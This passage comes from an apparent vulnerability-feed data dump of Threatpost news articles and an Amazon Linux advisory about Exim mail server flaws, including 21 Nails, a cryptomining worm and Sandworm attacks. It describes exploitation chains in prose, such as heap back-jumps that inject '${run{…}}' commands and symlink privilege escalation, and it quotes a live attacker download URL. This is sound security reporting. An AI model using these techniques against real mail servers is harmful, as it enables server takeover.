patches](<https://www.qualys.com/2021/05/04/21nails/21nails.patch>), Jogi told Threatpost; and the \u201cofficial\u201d patches from Exim are modified versions of those (those interested can review both for reference and comparison). Exim provided packagers and maintainers (including distros@openwall) with access to its security Git repository for updates.\n\nAs far as the patching status for various Linux distributions goes, Jogi said that the most widely used (CentOS, RHEL and SuSE), have already rolled out fixes. Debian, meanwhile, isn\u2019t vulnerable in the \u201coldstable\u201d (codename Stretch), \u201cstable\u201d (Buster) or \u201cStill-in-development\u201d (Sid) versions. However, the \u201cunstable\u201d (Bullseye) version is vulnerable \u2013 and [has not been patched](<https://security-tracker.debian.org/tracker/source-package/exim4>) as of the time of writing.\n\nAs for other distros, \u201cIt\u2019s hard to tell since there are [hundreds of distributions](<https://en.wikipedia.org/wiki/List_of_Linux_distributions>), and it\u2019s their responsibility to be up-to-date,\u201d he told Threatpost.\n\nAs for in-the-wild exploitation, \u201cwe haven\u2019t seen evidence of exploitation of these vulnerabilities first-hand, but given that most of the vulnerabilities were introduced as far back 2004, there is good chance they could be exploited by nation-state actors,\u201d he added.\n\n## **21 Nails Exim Vulnerability List**\n\nThe remotely exploitable bugs are:\n\n * CVE-2020-28017: Integer overflow in receive_add_recipient()\n * CVE-2020-28020: Integer overflow in receive_msg()\n * CVE-2020-28023: Out-of-bounds read in smtp_setup_msg()\n * CVE-2020-28021: New-line injection into spool header file\n * CVE-2020-28022: Heap out-of-bounds read and write in extract_option()\n * CVE-2020-28026: Line truncation and injection in spool_read_header()\n * CVE-2020-28019: Failure to reset function pointer after BDAT error\n * CVE-2020-28024: Heap buffer underflow in smtp_ungetc()\n * CVE-2020-28018: Use-after-free in tls-openssl.c\n * CVE-2020-28025: Heap out-of-bounds read in pdkim_finish_bodyhash()\n\nThese are the local bugs:\n\n * CVE-2020-28007: Link attack in Exim\u2019s log directory\n * CVE-2020-28008: Assorted attacks in Exim\u2019s spool directory\n * CVE-2020-28014: Arbitrary file creation and clobbering\n * CVE-2021-27216: Arbitrary file deletion\n * CVE-2020-28011: Heap buffer overflow in queue_run()\n * CVE-2020-28010: Heap out-of-bounds write in main()\n * CVE-2020-28013: Heap buffer overflow in parse_fix_phrase()\n * CVE-2020-28016: Heap out-of-bounds write in parse_fix_phrase()\n * CVE-2020-28015: New-line injection into spool header file\n * CVE-2020-28012: Missing close-on-exec flag for privileged pipe\n * CVE-2020-28009: Integer overflow in get_stdinput()\n\nAccording to the advisory, an unauthenticated, remote attacker could chain some of these together to create a potentially wormable exploit that would result in privilege escalation to root, resulting in the ability to execute commands to install programs, modify data and create new accounts.\n\n## **Technical Dive into 21 Nails: RCE Issues**\n\nQualys is not releasing any full proof-of-concept exploits; however, it did provide various code blocks and plenty of technical details within its analysis.\n\nResearchers said that the CVE-2020-28018 use-after-free bug is the most powerful vulnerability out of the 21. It\u2019s exploitable if the Exim server is built with OpenSSL; and if STARTTLS is enabled and if PIPELINING is enabled (the default); and if X_PIPE_CONNECT is disabled (the default before Exim 4.94).\n\nIt affects the tls_write() in tls-openssl.c function, according to Qualys, and can be exploited in various ways by remote attackers using a struct gstring (server_corked) and its string buffer (server_corked->s):\n\n 1. Overwrite the string buffer (which is sent by tls_write()) and create an information leak by leaking pointers to the heap;\n 2. Overwrite the struct gstring (with an arbitrary string pointer and size) and transform the use-after-free into a read-what-where primitive: It\u2019s possible to then read the heap to locate Exim\u2019s configuration;\n 3. Once the write-what-where primitive is achieved, attackers can overwrite Exim\u2019s configuration with an arbitrary \u201c${run{command}}\u201d that is executed by expand_string() as an unprivileged, basic \u201cexim\u201d user.\n\nAnother of the vulnerabilities of note is CVE-2020-28020, an integer overflow that allows an unauthenticated remote attacker to execute arbitrary commands as the \u201cexim\u201d user and snoop data.\n\nIt exists in the in receive_msg() function, researchers said, and while powerful, it\u2019s also the most difficult to exploit out of the 21 Nails group, and requires three separate mails to be sent to a target within the same SMTP session.\n\n\u201cBy default, Exim limits the size of a mail header to 1MB,\u201d according to the advisory. \u201cUnfortunately, an attacker can bypass this limit by sending only continuation lines (i.e., \u2018\\n\u2019 followed by \u2018 \u2018 or \u2018\\t\u2019), thereby overflowing the integer header_size.\u201d\n\nHowever, \u201cwhen the integer header_size overflows, it becomes negative\u2026but we cannot exploit the resulting back-jump\u2026because the free size of the current memory block also becomes negative\u2026which prevents us from writing to this back-jumped memory block,\u201d researchers explained. \u201cTo overflow the integer header_size, we must send 1GB to Exim: Consequently, our exploit must succeed after only a few tries (in particular, we cannot brute-force ASLR).\u201d\n\nEither of these vulnerabilities can be used by unauthenticated attackers to gain initial access as an \u201cexim\u201d user on the mail server. Once that\u2019s achieved, a bouquet of local privilege escalation (LPE) flaws are on offer to gain full root privileges.\n\n## **LPE for Achieving Root Status**\n\nThe privilege-escalation options include CVE-2020-28007, which allows a link attack in Exim\u2019s log directory.\n\nThe Exim binary is set-user-ID-root, and Exim operates as root in its log directory, which belongs to the \u201cexim\u201d user. So, an attacker with the privileges of the \u201cexim\u201d user can create a symlink (or a hardlink) in the log directory, append arbitrary contents to an arbitrary file and escalate permissions, according to Qualys.\n\nAdversaries could also use CVE-2020-28008 for assorted attacks in Exim\u2019s spool directory, researchers noted. These various vectors include: Directly writing to a spool header file (in the \u201cinput\u201d subdirectory); creating a long-named file in the \u201cdb\u201d subdirectory to overflow a stack-based buffer, or creating a symlink (or a hardlink) in the \u201cdb\u201d subdirectory to take ownership of an arbitrary file.\n\nOther options for LPE to root are CVE-2020-28011 and CVE-2020-28013, both heap buffer-overflow issues; CVE-2020-28010 and CVE-2020-28016, both heap out-of-bounds writes; or CVE-2020-28009, an integer overflow in get_stdinput().\n\n## **Memory-Corruption Bugs Abound**\n\nMost of the vulnerabilities in the advisory are easy-to-exploit memory corruptions that can get around various protections such as ASLR, NX and malloc hardening, according to Qualys.\n\n\u201cExim\u2019s memory allocator\u2026unintentionally provides attackers with powerful exploit primitives,\u201d researchers said. \u201cIn particular, if an attacker can pass a negative size to the allocator (through an integer overflow or direct control), then store_get() believes that the current block of memory is large enough (because size is negative), and\u2026as a result, store_get()\u2019s caller can overflow the current block of memory.\u201d\n\nAs a result, the next memory allocation can overwrite the beginning of Exim\u2019s heap. This is \u201ca relative write-what-where, which naturally bypasses ASLR (a \u2018backward-jump\u2019 or \u2018back-jump\u2019),\u201d according to the analysis.\n\nBecause of this, some of the bugs in the writeup can be McGyvered to allow arbitrary code execution.\n\n\u201cThe beginning of the heap contains Exim\u2019s configuration, which includes various strings that are passed to expand_string() at run time,\u201d researchers explained. \u201cConsequently, an attacker who can back-jump can overwrite these strings with \u2018${run{\u2026}}\u2019 and execute arbitrary commands (thus bypassing NX).\u201d\n\n## **Also of Interest: Authenticated Code Execution as Root**\n\nOne other interesting bug is CVE-2020-28021, a new-line injection into the spool header file that also allows RCE when chained with other issues.\n\n\u201cAn authenticated SMTP client can add an AUTH= parameter to its MAIL FROM command. This AUTH= parameter is decoded by auth_xtextdecode() and the resulting authenticated_sender is written to the spool header file without encoding or escaping,\u201d according to the advisory. \u201cUnfortunately, authenticated_sender can contain arbitrary characters, so an authenticated remote attacker can inject new lines into the spool header file and execute arbitrary commands, as root.\u201d\n\nThis vulnerability is particularly problematic for ISPs and mail providers that deploy Exim and offer mail accounts but not shell accounts, researchers added; and, it can be chained with an authentication bypass such as [CVE-2020-12783](<https://bugs.exim.org/show_bug.cgi?id=2571>), discovered by Orange Tsai in May 2020, for a full RCE-plus-LPE attack. Further, it can be used for information disclosure.\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-05T18:15:39", "type": "threatpost", "title": "Raft of Exim Security Holes Allow Linux Mail Server Takeovers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-12783", "CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-05T18:15:39", "id": "THREATPOST:63DD69067ED6D0F017DBA81FF1A56760", "href": "https://threatpost.com/exim-security-linux-mail-server-takeovers/165894/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-06T22:07:10", "description": "Microsoft is warning customers that some Azure installations are vulnerable to a recently-disclosed critical Linux Exim mail server flaw that is under active attack.\n\nThe warning comes after a widespread worm campaign was [disclosed on Friday](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>), targeting a flaw in the Exim mail transport agent (MTA), which are Linux-based mail servers that receive, route and deliver email messages from local users and remote hosts. However, the issue also plagues Azure users: Linux virtual machines, which run Exim servers, can be created through the Azure portal (a browser-based user interface to create VMs and their associated resources).\n\nIn an advisory, Microsoft said that Azure customers using the vulnerable software (Azure customers running virtual machines that use Exim version 4.87 to 4.91) are susceptible to the attack. Exim version 4.92 is not vulnerable.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCustomers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs,\u201d said JR Aquino, manager for Azure Incident Response at Microsoft Security Response Center, in an [advisory posted over the weekend](<https://blogs.technet.microsoft.com/msrc/2019/06/14/prevent-the-impact-of-a-linux-worm-by-updating-exim-cve-2019-10149/>). \u201cAs this vulnerability is being actively exploited by worm activity, [Microsoft] urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.\u201d\n\nAn attack of vulnerable systems could allow a malicious actor to gain remote command-execution, take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.\n\nMicrosoft for its part said that while it offers \u201cpartial mitigation,\u201d vulnerable systems are still impacted if an attacker\u2019s IP address is permitted through Network Security Groups, which is a list of security rules for virtual machines that allow or deny network traffic to resources connected to Azure Virtual Networks.\n\n\u201cThere is a partial mitigation for affected systems that can filter or block network traffic via Network Security Groups (NSGs), its advisory said. \u201cThe affected systems can mitigate Internet-based \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker\u2019s IP Address is permitted through Network Security Groups.\u201d\n\nThe flaw stems from improper validation of recipient address in the deliver_message() function in the server. The vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was discovered on [June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) in Exim versions 4.87 to 4.91.\n\nSpecifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet\u2019s email servers; Researchers said that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit.\n\nThe sheer number of vulnerable systems have researchers, vendors and more urging users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim version 4.92.\n\n\u201cAttackers have started probing for and experimenting with attacks against Exim systems vulnerable to CVE-2019-10149,\u201d Satnam Narang, senior research engineer with Tenable said in an email. \u201cSecurity researchers have observed active exploitation in the wild, one of which includes an attack resulting in permanent root access to vulnerable systems via SSH. It is critically important for those running Exim to upgrade to version 4.92 or apply the backported fix to vulnerable versions in order to prevent these newly discovered attacks from succeeding.\u201d\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-17T15:02:52", "type": "threatpost", "title": "Microsoft Pushes Azure Users to Patch Linux Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-17T15:02:52", "id": "THREATPOST:97FDAC2A1EE34161937EEA7D58123D3D", "href": "https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-19T22:01:51", "description": "A widespread campaign is exploiting a vulnerability in the Exim mail transport agent (MTA) to gain remote command-execution on victims\u2019 Linux systems. Researchers say that currently more than 3.5 million servers are at risk from the attacks, which are using a wormable exploit.\n\nSpecifically under attack is a flaw in Exim-based mail servers, which run almost 57 percent of the internet\u2019s email servers. Attackers are exploiting the flaw, discovered last week, to take control of the victim machines, search the internet for other machines to infect, and to initiate a cryptominer infection.\n\n\u201cThese kinds of attacks have big implications for organizations,\u201d said researchers with Cybereason in a [post on Thursday](<https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability>). \u201cThe recovery process from this type of attack is costly and time-consuming.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nExim mail servers are open-source MTAs, which essentially receive, route and deliver email messages from local users and remote hosts. Exim is the default MTA included on some Linux systems.\n\n## The Flaw\n\nThe flaw stems from improper validation of recipient address in the deliver_message() function in the server.\n\nThe vulnerability (CVE-2019-10149), which has a critical severity score of 9.8 out of 10 on the CVSS v3 scale, was discovered on [June 5](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) in Exim versions 4.87 to 4.91. Exim version 4.92 is not vulnerable.\n\n\u201cA patch exists already, is being tested, and backported to all versions we released since (and including) 4.87,\u201d according to a recent [security advisory](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>). \u201cThe severity depends on your configuration. It depends on how close to the standard configuration your Exim runtime configuration is. The closer the better.\u201d\n\nAn initial wave of attacks on this vulnerability \u2013 which involved attackers pushing out exploits from a malicious command-and-control (C2) server \u2013 was first discovered June 9 by researcher [Freddie Leeman.](<https://twitter.com/freddieleeman/status/1137729455181500421>)\n\n\u201cJust detected the first attempts to exploit recent #exim remote command execution (RCE) security flaw (CVE-2019-10149),\u201d he said in a tweet. \u201cTries to downloads a script located at http://173.212.214.137/s (careful). If you run Exim, make sure it\u2019s up-to-date.\u201d\n\n> Just detected the first attempts to exploit recent [#exim](<https://twitter.com/hashtag/exim?src=hash&ref_src=twsrc%5Etfw>) remote command execution (RCE) security flaw (CVE-2019-10149). Tries to downloads a script located at http://173.212.214.137/s (careful). If you run Exim, make sure it's up-to-date. [@qualys](<https://twitter.com/qualys?ref_src=twsrc%5Etfw>) [pic.twitter.com/s7veGBcKWO](<https://t.co/s7veGBcKWO>)\n> \n> \u2014 Freddie Leeman (@freddieleeman) [June 9, 2019](<https://twitter.com/freddieleeman/status/1137729455181500421?ref_src=twsrc%5Etfw>)\n\nThen more recently, researchers with Cybereason tracked a second wave of attacks which they believe are launched by a different attacker.\n\n## The Worm Attack\n\nThe more recent and sophisticated campaign first installs an RSA private authentication key on the vulnerable SSH server for root authentication. Once remote command-execution is established, the attacker then deploys a port scanner, to sniff out other vulnerable servers and installs a coin-miner.\n\nIn addition, the campaign appears to be \u201chighly pervasive\u201d with extra measures \u2013 such as installing several payloads at different stages including the port scanner and coin-miner \u2013 for persistence on the infected system.\n\n\u201cIt is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm,\u201d researchers said. \u201cThey used hidden services on the TOR network to host their payloads and created deceiving windows i[![vulnerable exim servers](https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/14093602/exim-300x142.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/06/14093602/exim.png>)con files [which is actually a password protected zip archive containing the coin miner executable] in an attempt to throw off researchers and even system administrators who are looking at their logs.\u201d\n\nResearchers said that they are still looking for further information about the attack, but in the meantime urged users to patch every Exim installation in their organization and make sure that it is updated to the most recent version, Exim version 4.92.\n\n\u201cThe prevalence of vulnerable Exim servers (3,683,029 across the globe according to Shodan) allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue,\u201d researchers said.\n\n**_Ransomware is on the rise: _**[**_Don\u2019t miss our free Threatpost webinar _**](<https://attendee.gotowebinar.com/register/611039692762707715?source=enews>)**_on the ransomware threat landscape, June 19 at 2 p.m. ET. _****_Join _****_Threatpost _****_and a panel of experts as they discuss_****_ how to manage the risk associated with this unique attack type,_** **_with exclusive insights into new developments on the ransomware front and how to stay ahead of the attackers._**\n", "cvss3": {}, "published": "2019-06-14T14:04:30", "type": "threatpost", "title": "Millions of Linux Servers Under Worm Attack Via Exim Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149", "CVE-2020-9586"], "modified": "2019-06-14T14:04:30", "id": "THREATPOST:406129F1455008D4B9A55FF40B09CCAF", "href": "https://threatpost.com/linux-servers-worm-exim-flaw/145698/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:24:47", "description": "The Russia-linked APT group Sandworm has been spotted exploiting a vulnerability in the internet\u2019s top email server software, according to the National Security Agency (NSA).\n\nThe bug exists in the Exim Mail Transfer Agent (MTA) software, an open-source offering used on Linux and Unix-like systems. It essentially receives, routes and delivers email messages from local users and remote hosts. Exim is the default MTA included on some Linux distros like Debian and Red Hat, and Exim-based mail servers in general run almost 57 percent of the internet\u2019s email servers, according to [a survey last year](<http://www.securityspace.com/s_survey/data/man.201905/mxsurvey.html>).\n\nThe bug ([CVE-2019-10149](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>)) would allow an unauthenticated remote attacker to execute commands with root privileges on an Exim mail server, allowing the attacker to install programs, modify data and create new accounts. It\u2019s also wormable; a previous campaign spread cryptominers automatically from system to system using a port sniffer. The bug was patched last June.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe NSA this week released a cybersecurity advisory on new exploit activity from Unit 74455 of the GRU Main Center for Special Technologies (GTsST), a division of the Russian military intelligence service, a.k.a. Sandworm, a.k.a. BlackEnergy. The APT [has been linked to](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) the Industroyer attack on the Ukrainian power grid as well as the [infamous NotPetya attacks](<https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/>). According to Kaspersky, the group is part of a nexus of related APTs that also includes a [recently discovered group called Zebrocy](<https://threatpost.com/zebrocy-russian-apt/145328/>).\n\nThe flaw can be exploited using a specially crafted email containing a modified \u201cMAIL FROM\u201d field in a Simple Mail Transfer Protocol (SMTP) message. The APT has been exploiting unpatched Exim servers in this way since at least August, according [the NSA\u2019s advisory](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>).\n\nOnce Sandworm compromises a target Exim server, it subsequently downloads and executes a shell script from a Sandworm-controlled domain to establish a persistent backdoor that can be used for reconnaissance, spying on mail messages, lateral movement and additional malware implantation.\n\n\u201cThis script would attempt to do the following on the victim machine: Add privileged users; disable network security settings; update SSH configurations to enable additional remote access; and execute an additional script to enable follow-on exploitation,\u201d according to the NSA, which didn\u2019t disclose any details as to the victimology of the latest offensives.\n\nExim admins should update their MTAs to [version 4.93 or newer](<https://exim.org/mirrors.html>) to mitigate the issue, the NSA noted.\n\n\u201cThis emphasizes the need for a good vulnerability management plan,\u201d Lamar Bailey, senior director of security research at Tripwire, said via email. \u201cCVE-2019-10149 has been out almost a year now and has a CVSS score above 9, making it a critical vulnerability. High-scoring vulnerabilities on a production email server are high risk and there should be plans in place to remediate them ASAP.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-29T16:34:38", "type": "threatpost", "title": "NSA Warns of Sandworm Backdoor Attacks on Mail Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149", "CVE-2020-5135"], "modified": "2020-05-29T16:34:38", "id": "THREATPOST:130EDA07603C228BE562B445904A297A", "href": "https://threatpost.com/nsa-sandworm-spy-attacks-exim-mail-servers/156125/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T21:53:33", "description": "A patch has been issued for a critical flaw in the Exim email server software, which could potentially open Exim-based servers up to denial of service or remote code execution attacks.\n\nExim, which is free software used on Unix-like operating systems (including Linux or Mac OSX), serves as a mail transfer agent that manages mail routing services for organizations. According to a Shodan analysis, Exim is the most used mail transfer agent globally and has over five million internet-facing hosts.\n\nThis specific flaw ([CVE-2019-16928](<https://nvd.nist.gov/vuln/detail/CVE-2019-16928>)) is a heap-based overflow vulnerability. A [buffer overflow](<https://cwe.mitre.org/data/definitions/122.html>) is a type of flaw where a buffer (a region in physical memory storage used to temporarily store data while it is being moved) that can be overwritten is allocated in the heap portion of memory (a region of process\u2019s memory which is used to store dynamic variables). That excess data in turn corrupts nearby space in memory and could alter other data, opening the door for malicious attacks. This specific flaw could enable bad actors to either crash servers \u2013 and also, as an Exim advisory said, \u201cremote code execution seems to be possible.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nAccording to Exim, the flaw exists in the string \u201c_vformat\u201d, which is part of the file (string.c) of the component EHLO Command Handler. An EHLO command is an Extended Simple Mail Transfer Protocol (ESMTP) command sent by an email server to identify itself when connecting to another email server to start the process of sending an email.\n\n\u201cThe currently known exploit uses an extraordinary long EHLO string to crash the Exim process that is receiving the message.\u201d according to a [Friday advisory](<https://www.exim.org/static/doc/security/CVE-2019-16928.txt>). \u201cWhile at this mode of operation Exim already dropped its privileges, other paths to reach the vulnerable code may exist.\u201d\n\nAccording to [VuldDB](<https://vuldb.com/?id.142692>), it is possible to exploit the vulnerability remotely. There are known technical details, but no exploit is available, according to the site. Threatpost has reached out to Exim for further details about when the vulnerability was discovered and disclosed.\n\nThe flaw impacts Exim versions between 4.92 up to 4.92.2. A fix has been issued in the version 4.92.3. No other mitigations exist other than updating the server, according to Exim\u2019s advisory.\n\n\u201cIf you can\u2019t install the above versions, ask your package maintainer for a version containing the backported fix,\u201d advised Exim. \u201cOn request and depending on our resources we will support [customers] in backporting the fix.\u201d\n\nIt\u2019s the second critical Exim vulnerability to be patched this month \u2013 [earlier in September](<https://threatpost.com/critical-exim-flaw-opens-millions-of-servers-to-takeover/148108/>), researchers urged users to upgrade their Exim servers immediately after millions of servers were found to be vulnerable to a critical flaw that could allow a remote, unauthenticated attacker to take full control of them. Another [vulnerability](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>) in June was exploited in a widespread campaign to gain remote command-execution on victims\u2019 Linux systems. Researchers said that for this flaw (CVE-2019-10149) currently more than 3.5 million servers were at risk from [the attacks](<https://threatpost.com/microsoft-pushes-azure-users-to-patch-linux-systems/145749/>), which used a wormable exploit.\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-09-30T14:12:35", "type": "threatpost", "title": "Critical Exim Flaw Opens Servers to Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-10149", "CVE-2019-16928"], "modified": "2019-09-30T14:12:35", "id": "THREATPOST:1E8692DD3729CF2A8B526A85F076513F", "href": "https://threatpost.com/critical-exim-flaw-opens-servers-to-remote-code-execution/148773/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2023-06-06T15:15:53", "description": "**Issue Overview:**\n\nExim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the log directory (owned by a non-root user), a symlink or hard link attack allows overwriting critical root-owned files anywhere on the filesystem. (CVE-2020-28007)\n\nExim 4 before 4.94.2 allows Execution with Unnecessary Privileges. Because Exim operates as root in the spool directory (owned by a non-root user), an attacker can write to a /var/spool/exim4/input spool header file, in which a crafted recipient address can indirectly lead to command execution. (CVE-2020-28008)\n\nExim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow because get_stdinput allows unbounded reads that are accompanied by unbounded increases in a certain size variable. NOTE: exploitation may be impractical because of the execution time needed to overflow (multiple days). (CVE-2020-28009)\n\nExim 4 before 4.94.2 allows Out-of-bounds Write because the main function, while setuid root, copies the current working directory pathname into a buffer that is too small (on some common platforms). (CVE-2020-28010)\n\nExim 4 before 4.94.2 allows Heap-based Buffer Overflow in queue_run via two sender options: -R and -S. This may cause privilege escalation from exim to root. (CVE-2020-28011)\n\nExim 4 before 4.94.2 allows Exposure of File Descriptor to Unintended Control Sphere because rda_interpret uses a privileged pipe that lacks a close-on-exec flag. (CVE-2020-28012)\n\nExim 4 before 4.94.2 allows Heap-based Buffer Overflow because it mishandles \"-F '.('\" on the command line, and thus may allow privilege escalation from any user to root. This occurs because of the interpretation of negative sizes in strncpy. (CVE-2020-28013)\n\nExim 4 before 4.94.2 allows Execution with Unnecessary Privileges. The -oP option is available to the exim user, and allows a denial of service because root-owned files can be overwritten. (CVE-2020-28014)\n\nExim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA. (CVE-2020-28019)\n\nExim 4 before 4.94.2 has Improper Restriction of Write Operations within the Bounds of a Memory Buffer. This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands. (CVE-2020-28022)\n\nExim 4 before 4.94.2 allows Out-of-bounds Read. smtp_setup_msg may disclose sensitive information from process memory to an unauthenticated SMTP client. (CVE-2020-28023)\n\nExim 4 before 4.94.2 allows Buffer Underwrite that may result in unauthenticated remote attackers executing arbitrary commands, because smtp_ungetc was only intended to push back characters, but can actually push back non-character error codes such as EOF. (CVE-2020-28024)\n\nExim 4 before 4.94.2 allows Out-of-bounds Read because pdkim_finish_bodyhash does not validate the relationship between sig->bodyhash.len and b->bh.len; thus, a crafted DKIM-Signature header might lead to a leak of sensitive information from process memory. (CVE-2020-28025)\n\nExim 4 before 4.94.2 has Improper Neutralization of Line Delimiters, relevant in non-default configurations that enable Delivery Status Notification (DSN). Certain uses of ORCPT= can place a newline into a spool header file, and indirectly allow unauthenticated remote attackers to execute arbitrary commands as root. (CVE-2020-28026)\n\nExim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options. (CVE-2021-27216)\n\n \n**Affected Packages:** \n\n\nexim\n\n \n**Issue Correction:** \nRun _yum update exim_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 exim-debuginfo-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-greylist-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mysql-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-mon-4.92-1.33.amzn1.i686 \n \u00a0\u00a0\u00a0 exim-pgsql-4.92-1.33.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 exim-4.92-1.33.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 exim-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-pgsql-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mon-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-greylist-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-debuginfo-4.92-1.33.amzn1.x86_64 \n \u00a0\u00a0\u00a0 exim-mysql-4.92-1.33.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: 